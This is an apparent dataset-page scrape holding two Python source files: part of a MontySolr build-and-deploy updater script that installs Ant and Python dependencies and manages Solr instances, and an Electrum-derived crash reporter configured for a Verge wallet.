if ' version ' in version:
elements = version.split()
version = elements[elements.index('version')+1]
version = int(version.replace('.', '')[0:3])
if version < 182:
error("""
Your installation of ant is too old: %s
You can run: montysolrupdate.py --setup_ant
and set ANT_HOME=%s""" %
(version, os.path.join(INSTDIR, "perpetuum/ant")))
def setup_ant(options):
"""
On old systems, such as CentOS, the ant binaries are useless
"""
if options.force_recompilation and os.path.exists('ant'):
run_cmd(['rm', '-fr', 'ant'])
elif os.path.exists('ant/RELEASE') and str(get_pid('ant/RELEASE')) == str(UPDATER_RELEASE):
return # already installed
with open("install_ant.sh", "w") as build_ant:
build_ant.write("""#!/bin/bash -e
export JAVA_HOME=%(java_home)s
export ANT_HOME=%(ant_home)s
wget -nc http://archive.apache.org/dist/ant/binaries/apache-ant-1.8.4-bin.tar.gz
tar -xzf apache-ant-1.8.4-bin.tar.gz
mv apache-ant-1.8.4 ant
cd ant
export PATH=%(ant_home)s/bin:$PATH
ant -f fetch.xml -Ddest=system
echo "%(release)s" > RELEASE
""" % {'java_home': JAVA_HOME,
'ant_home': os.path.join(INSTDIR, "perpetuum/ant"),
'release': UPDATER_RELEASE})
run_cmd(['chmod', 'u+x', 'install_ant.sh'])
run_cmd(['./install_ant.sh'])
def setup_python(options):
if options.force_recompilation and os.path.exists('python'):
run_cmd(['rm', '-fr', 'python'])
elif os.path.exists('python/RELEASE') and str(get_pid('python/RELEASE')) == str(PYTHON_RELEASE):
return # python already installed
with open("install_python.sh", "w") as inpython:
header = '\n'.join([
'#!/bin/bash -e',
'echo "using python: %(python)s"',
'[ -d python ] || mkdir python',
'echo "0" > python/RELEASE',
'',
])
venv_activate = '\n'.join([
'virtualenv --unzip-setuptools -p %(python)s python',
'source python/bin/activate',
'echo "done creating python virtualenv"',
'',
])
modules = ' '.join([
'setuptools',
'sqlalchemy',
'mysql-python',
#'numpy',
#'lxml',
'simplejson',
'configobj',
'pyparsing==1.5.7',
'nameparser'
])
core_commands = '\n'.join([
'#easy_install -U distribute==0.6.30',
'',
'# install needed modules; numpy needs libatlas-base-dev',
'pip install --upgrade %s' % modules,
'',
'# verify installation',
'python -c "import numpy,lxml,simplejson,configobj,pyparsing, MySQLdb, sqlalchemy"',
'',
])
venv_deactivate = 'deactivate\n'
cleanup = '\n'.join([
'echo "%(release)s" > python/RELEASE',
'exit 0',
])
if options.no_venv:
venv_activate,venv_deactivate = '',''
inpython.write(
(header+venv_activate+core_commands+venv_deactivate+cleanup)
% {'python': sys.executable, 'release': PYTHON_RELEASE} )
run_cmd(['chmod', 'u+x', 'install_python.sh'])
run_cmd(['./install_python.sh'])
def setup_build_properties(options):
lines = []
with open('build.properties.default', 'r') as infile:
for line in infile:
line = line.strip()
if len(line) > 0 and line[0] != '#':
parts = line.split('=', 1)
if parts[0] == 'python':
if options.no_venv:
lines.append('python=python')
else:
lines.append('python=%s' % os.path.realpath(os.path.join(INSTDIR, "perpetuum", "python/bin/python")))
elif parts[0] == 'jcc':
lines.append('jcc=%s' % {5:'-m jcc',6:'-m jcc.__main__',7:'-m jcc'}[sys.version_info[1]])
elif parts[0] == 'ant':
lines.append('ant=%s' % 'ant')
else:
lines.append(line)
fo = open('build.properties', 'w')
fo.write("\n".join(lines))
fo.close()
def upgrade_montysolr(curr_tag, git_tag,options):
with changed_dir('montysolr'):
with open('build-montysolr.sh', 'w') as build_script:
header = '#!/bin/bash -e\n'
venv_activate = 'source ../python/bin/activate\n'
venv_deactivate = 'deactivate\n'
core_commands = '\n'.join([
'export JAVA_HOME=%(java_home)s',
'export ANT_HOME=%(ant_home)s',
'',
'case "$1" in',
'"nuke")',
' if [ -f RELEASE ]; then',
' rm RELEASE',
' fi',
' ant clean',
' ant get-solr build-all',
' ;;',
'"minor" | "3")',
' if [ -f RELEASE ]; then',
' rm RELEASE',
' fi',
' ant get-solr build-all',
' ;;',
'esac',
'',
'ant build-contrib',
'ant -file contrib/examples/build.xml clean build-one -Dename=%(example)s',
''
])
if options.no_venv:
venv_activate,venv_deactivate='',''
build_script.write(
(header+venv_activate+core_commands+venv_deactivate)
% {'example': INSTNAME, 'java_home': JAVA_HOME, 'ant_home': ANT_HOME}
)
run_cmd(['chmod', 'u+x', 'build-montysolr.sh'])
#if os.path.exists('RELEASE'):
# run_cmd(['rm', 'RELEASE'], strict=False)
# get the target tag
# run_cmd(['git', 'checkout', '-f', '-b', git_tag.ref], strict=False)
run_cmd(['git', 'fetch', '--all'])
run_cmd(['git', 'stash'])
run_cmd(['git', 'reset', '--hard', '/' in git_tag.ref and git_tag.ref or ('origin/' + git_tag.ref)])
setup_build_properties(options)
# nuke everything, start from scratch
if curr_tag.solr_ver != git_tag.solr_ver or curr_tag.major != git_tag.major:
#run_cmd(['ant', 'clean'])
#run_cmd(['ant', 'get-solr', 'build-solr'])
# maybe i could make this to work, right now: upgrades must be invoked after source was called
#run_cmd(['bash', '-c', 'source %s/python/bin/activate; ant get-solr build-solr; deactivate' % os.path.realpath('..')])
#run_cmd(['ant', 'build-all'])
run_cmd(['./build-montysolr.sh', 'nuke'])
elif curr_tag.minor != git_tag.minor:
#run_cmd(['ant', 'get-solr', 'build-solr'])
#run_cmd(['ant', 'build-all'])
run_cmd(['./build-montysolr.sh', 'minor'])
else:
run_cmd(['./build-montysolr.sh', 'patch'])
# always re-compile, this is not too expensive
#run_cmd(['ant', 'build-contrib'])
# assemble the deployment target
#run_cmd(['ant', '-file', 'contrib/examples/build.xml', 'clean', 'build-one', '-Dename=%s' % INSTNAME])
#run_cmd(['ant', '-file', 'contrib/examples/build.xml', 'run-configured', '-Dename=%s' % INSTNAME,
# '-Dtarget=generate-run.sh', '-Dprofile=silent.profile'])
# update the RELEASE file
with open('RELEASE', 'w') as release:
release.write(str(git_tag))
def build_example(git_tag,options):
with changed_dir('montysolr'):
with open('build-example.sh', 'w') as build_script:
header = '#!/bin/bash -e\n'
venv_activate = 'source ../python/bin/activate\n'
venv_deactivate = 'deactivate\n'
core_commands = '\n'.join([
'example=${1:%(example)s}',
'profile_names=${2:silent}',
'export JAVA_HOME=%(java_home)s',
'export ANT_HOME=%(ant_home)s',
'',
'ant -file contrib/examples/build.xml clean build-one -Dename=$example',
'',
'# generate run.sh for every profile',
'for profile_name in $profile_names',
'do',
' ant -file contrib/examples/build.xml run-configured -Dename=$example -Dtarget=generate-run.sh -Dprofile=${profile_name}.profile',
' mv build/contrib/examples/${example}/run.sh build/contrib/examples/${example}/${profile_name}.run.sh',
'done',
'',
])
if options.no_venv:
venv_activate,venv_deactivate='',''
build_script.write(
(header+venv_activate+core_commands+venv_deactivate)
% {'example': INSTNAME, 'java_home': JAVA_HOME, 'ant_home': ANT_HOME}
)
run_cmd(['chmod', 'u+x', './build-example.sh'])
profiles = map(lambda x: x.replace('.profile',''), filter(lambda x: '.profile' in x, os.listdir('build/contrib/examples/%s' % INSTNAME)))
run_cmd(['./build-example.sh', INSTNAME, '"%s"' % " ".join(profiles)])
with open('build/contrib/examples/%s/RELEASE' % INSTNAME, 'w') as release:
release.write(str(git_tag))
def stop_live_instance(instance_dir, max_wait=30):
with changed_dir(instance_dir):
pid = get_pid('montysolr.pid')
if check_pid_is_running(pid) == False:
print('Warning: wanted to stop live instance which is not running: %s' % instance_dir)
return True
port = None
if os.path.exists('port'):
fo = open('port', 'r')
port = fo.read().strip()
fo.close()
wait_no_more = time.time() + max_wait/2
while time.time() < wait_no_more:
if check_pid_is_running(pid):
run_cmd(['kill', pid])
time.sleep(1)
else:
continue
if check_pid_is_running(pid):
wait_no_more = time.time() + max_wait/2
while time.time() < wait_no_more:
if check_pid_is_running(pid):
run_cmd(['kill', '-9', pid])
time.sleep(1)
else:
continue
if check_pid_is_running(pid):
error("We cannot stop %s pid=%s" % (instance_dir, pid))
return True
def start_live_instance(options, instance_dir, port,
max_attempts = 3,
max_wait=30,
instance_mode='',
list_of_readers=[]):
with changed_dir(instance_dir):
if options.run_command_before:
run_cmd([options.run_command_before])
pid = get_pid('montysolr.pid')
if pid != -1 and check_pid_is_running(pid):
error("The live instance at %s is still running" % instance_dir)
fo = open('port', 'w')
fo.write(str(port))
fo.close()
#i am seeing the socket is not closed on time
#s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#try:
# s.bind(('', port)) # will fail if the socket is already used
#finally:
# s.close()
failed = get_pid('FAILED.counter')
if failed > max_attempts:
error("The live instance is a zombie (probably compilation failed), call a doctor!")
profile_name = 'normal'
if instance_mode == 'w':
profile_name = 'writer'
elif instance_mode == 'r':
profile_name = 'reader'
else:
profile_name = 'normal'
if not os.path.exists('%s.run.sh' % profile_name):
error("Missing %s.run.sh - (you must have a %s.profile to generate this file)" %
(profile_name, profile_name))
fi = open('%s.run.sh' % profile_name, 'r')
start = fi.read()
fi.close()
venv_activate = '' if options.no_venv else 'source ../python/bin/activate'
lines = start.split("\n")
lines.insert(1, """
# File modified by: montysolrupdate.py
# Base profile: %(profile)s.run.sh
%(venv_activate)s
export PYTHONPATH=`python -c "import sys;print ':'.join(sys.path)"`:$PYTHONPATH
""" % {'profile': profile_name, 'venv_activate':venv_activate}
)
start = '\n'.join(lines)
start = re.sub(r'HOMEDIR=.*\n', 'HOMEDIR=%s\n' % os.path.realpath('.'), start)
start = re.sub(r'-Djetty.port\=\d+', '-Djetty.port=%s' % port, start)
start = re.sub('\n([\t\s]+)(java -cp )', '\\1export PATH=%s/bin:$PATH\n\\1\\2' % JAVA_HOME, start)
# this is necessary only when in test run (and there we can be sure that the files were
# overwritten when a new code was installed)
if options.test_scenario or not os.path.exists('solr/collection1/conf/solrconfig.xml.orig'):
run_cmd(['cp', 'solr/collection1/conf/solrconfig.xml', 'solr/collection1/conf/solrconfig.xml.orig'])
solrconfig = open('solr/collection1/conf/solrconfig.xml.orig', 'r').read()
if instance_mode =='w' and len(list_of_readers): # for master-writers
# we must change also the solrconfig
list_of_nodes = []
for n in list_of_readers:
reader_port = extract_port(n.split('#')[0])
list_of_nodes.append(' <str>http://localhost:%s/solr/ads-config?command=reopenSearcher</str>' % reader_port)
solrconfig = solrconfig.replace('</updateHandler>',
"""
<!-- automatically generated by montysolr-update.py -->
<listener event="postCommit"
class="solr.RunExecutableListener">
<str name="exe">curl</str>
<str name="dir">.</str>
<bool name="wait">false</bool>
<arr name="args"> %s </arr>
</listener>
</updateHandler>
""" % ' '.join(list_of_nodes))
with open('solr/collection1/conf/solrconfig.xml.new', 'w') as fi_solrconfig:
fi_solrconfig.write(solrconfig)
with open('solr/collection1/conf/solrconfig.xml', 'w') as fi_solrconfig:
fi_solrconfig.write(solrconfig)
fo = open('automatic-run.sh', 'w')
fo.write(start)
fo.close()
run_cmd(['chmod', 'u+x', 'automatic-run.sh'])
run_cmd(['bash', '-e', './automatic-run.sh', '"%s"' % START_JVMARGS, '"%s"' % START_ARGS, '&'], False)
fo = open('manual-run.sh', 'w')
fo.write('bash -e ./automatic-run.sh "%s" "%s" &' % (START_JVMARGS, START_ARGS))
fo.close()
kwargs = dict(max_wait=options.timeout)
if options.check_diagnostics:
kwargs['tmpl'] ='http://localhost:%s/solr/montysolr_diagnostics'
if not check_instance_health(port, **kwargs):
run_cmd(['kill', '-9', str(get_pid('montysolr.pid'))])
time.sleep(3)
failed += 1
save_into_file('FAILED.counter', failed)
error("Instance is not in a healthy state %s" % instance_dir)
return False
if os.path.exists('FAILED.counter'):
run_cmd(['rm', 'FAILED.counter'])
if options.run_command_after:
run_cmd([options.run_command_after])
return True
def main(argv):
check_basics()
if not os.path.exists(os.path.join(INSTDIR, 'perpetuum')):
run_cmd(['mkdir', os.path.join(INSTDIR, 'perpetuum')])
with changed_dir(os.path.join(INSTDIR, 'perpetuum')):
update_pid = get_pid('update.pid')
if update_pid != -1 and check_pid_is_running(update_pid):
error("The script is already running with pid: %s" % update_pid)
acquire_lock('update.pid')
parser = get_arg_parser()
options, args = parser.parse_args(argv)
check_options(options)
print "============="
for k,v in options.__dict__.items():
print '%s=%s' % (k, v)
print 'args=', args
print "============="
# install pre-requisities if requested
check_prerequisites(options)
instance_names = []
if len(args) > 1:
instance_names = args[1:]
else:
print('WARNING: no live instance name(s) supplied')
if options.update:
if options.force_recompilation:
run_cmd(['rm', 'montysolr/RELEASE'], strict=False)
# check the repo and find out if there are changes
git_tag = get_latest_git_release_tag('montysolr')
curr_tag = get_release_tag('montysolr/RELEASE')
# for testing, we may want to use the latest code
if options.test_branch:
git_tag.ref = options.test_branch
# pretend some change has happened (used for testing)
if options.test_scenario:
options.test_scenario(curr_tag)
if curr_tag > git_tag:
error("whaaat!?! The current instance has a higher tag than montysolr.git!? %s > %s" % (curr_tag, git_tag))
if curr_tag == git_tag:
if len(instance_names) > 0:
print("Compiled version is the latest, we'll just check the live instance(s)")
elif curr_tag != git_tag:
upgrade_montysolr(curr_tag, git_tag,options)
if len(instance_names) > 0:
if options.stop or options.restart:
for iname in instance_names:
parts = iname.split('#')
stop_live_instance(instance_dir=parts[0], max_wait=60) # when killing, we can be nasty
if options.update or options.start or options.restart:
check_live_instance(options, instance_names)
remove_lock('update.pid')
if __name__ == '__main__':
main(sys.argv)
|
base_crash_reporter.py
|
# Electrum - lightweight Bitcoin client
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import json
import locale
import traceback
import subprocess
import sys
import os
from .version import ELECTRUM_VERSION
from . import constants
from .i18n import _
from .util import make_aiohttp_session
from .logging import describe_os_version, Logger
class BaseCrashReporter(Logger):
report_server = "https://vergecurrency.com"
config_key = "show_crash_reporter"
issue_template = """<h2>Traceback</h2>
<pre>
{traceback}
</pre>
<h2>Additional information</h2>
<ul>
<li>Electrum version: {app_version}</li>
<li>Python version: {python_version}</li>
<li>Operating system: {os}</li>
<li>Wallet type: {wallet_type}</li>
<li>Locale: {locale}</li>
</ul>
"""
CRASH_MESSAGE = _('Something went wrong while executing Electrum.')
CRASH_TITLE = _('Sorry!')
REQUEST_HELP_MESSAGE = _('To help us diagnose and fix the problem, you can send us a bug report that contains '
'useful debug information:')
DESCRIBE_ERROR_MESSAGE = _("Please briefly describe what led to the error (optional):")
ASK_CONFIRM_SEND = _("Do you want to send this report?")
def __init__(self, exctype, value, tb):
Logger.__init__(self)
self.exc_args = (exctype, value, tb)
def send_report(self, asyncio_loop, proxy, endpoint="/crash", *, timeout=None):
if constants.net.GENESIS[-4:] not in ["4943", "e26f"] and ".vergecurrency.com" in BaseCrashReporter.report_server:
# Gah! Some kind of altcoin wants to send us crash reports.
raise Exception(_("Missing report URL."))
report = self.get_traceback_info()
report.update(self.get_additional_info())
report = json.dumps(report)
coro = self.do_post(proxy, BaseCrashReporter.report_server + endpoint, data=report)
response = asyncio.run_coroutine_threadsafe(coro, asyncio_loop).result(timeout)
return response
async def do_post(self, proxy, url, data):
async with make_aiohttp_session(proxy) as session:
async with session.post(url, data=data) as resp:
return await resp.text()
def get_traceback_info(self):
exc_string = str(self.exc_args[1])
stack = traceback.extract_tb(self.exc_args[2])
readable_trace = "".join(traceback.format_list(stack))
id = {
"file": stack[-1].filename,
"name": stack[-1].name,
"type": self.exc_args[0].__name__
}
return {
"exc_string": exc_string,
"stack": readable_trace,
"id": id
}
def get_additional_info(self):
args = {
"app_version": ELECTRUM_VERSION,
"python_version": sys.version,
"os": describe_os_version(),
"wallet_type": "unknown",
"locale": locale.getdefaultlocale()[0] or "?",
"description": self.get_user_description()
}
try:
args["wallet_type"] = self.get_wallet_type()
except:
# Maybe the wallet isn't loaded yet
pass
try:
args["app_version"] = self.get_git_version()
except:
# This is probably not running from source
pass
return args
@staticmethod
def get_git_version():
dir = os.path.dirname(os.path.realpath(sys.argv[0]))
version = subprocess.check_output(
['git', 'describe', '--always', '--dirty'], cwd=dir)
return str(version, "utf8").strip()
def get_report_string(self):
info = self.get_additional_info()
info["traceback"] = "".join(traceback.format_exception(*self.exc_args))
return self.issue_template.format(**info)
def get_user_description(self):
raise NotImplementedError
def get_wallet_type(self):
raise NotImplementedError
def trigger_crash():
# note: do not change the type of the exception, the message,
# or the name of this method. All reports generated through this
# method will be grouped together by the crash reporter, and thus
# don't spam the issue tracker.
class TestingException(Exception):
pass
def crash_test():
raise TestingException("triggered crash for testing purposes")
import threading
t = threading.Thread(target=crash_test)
t.start()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.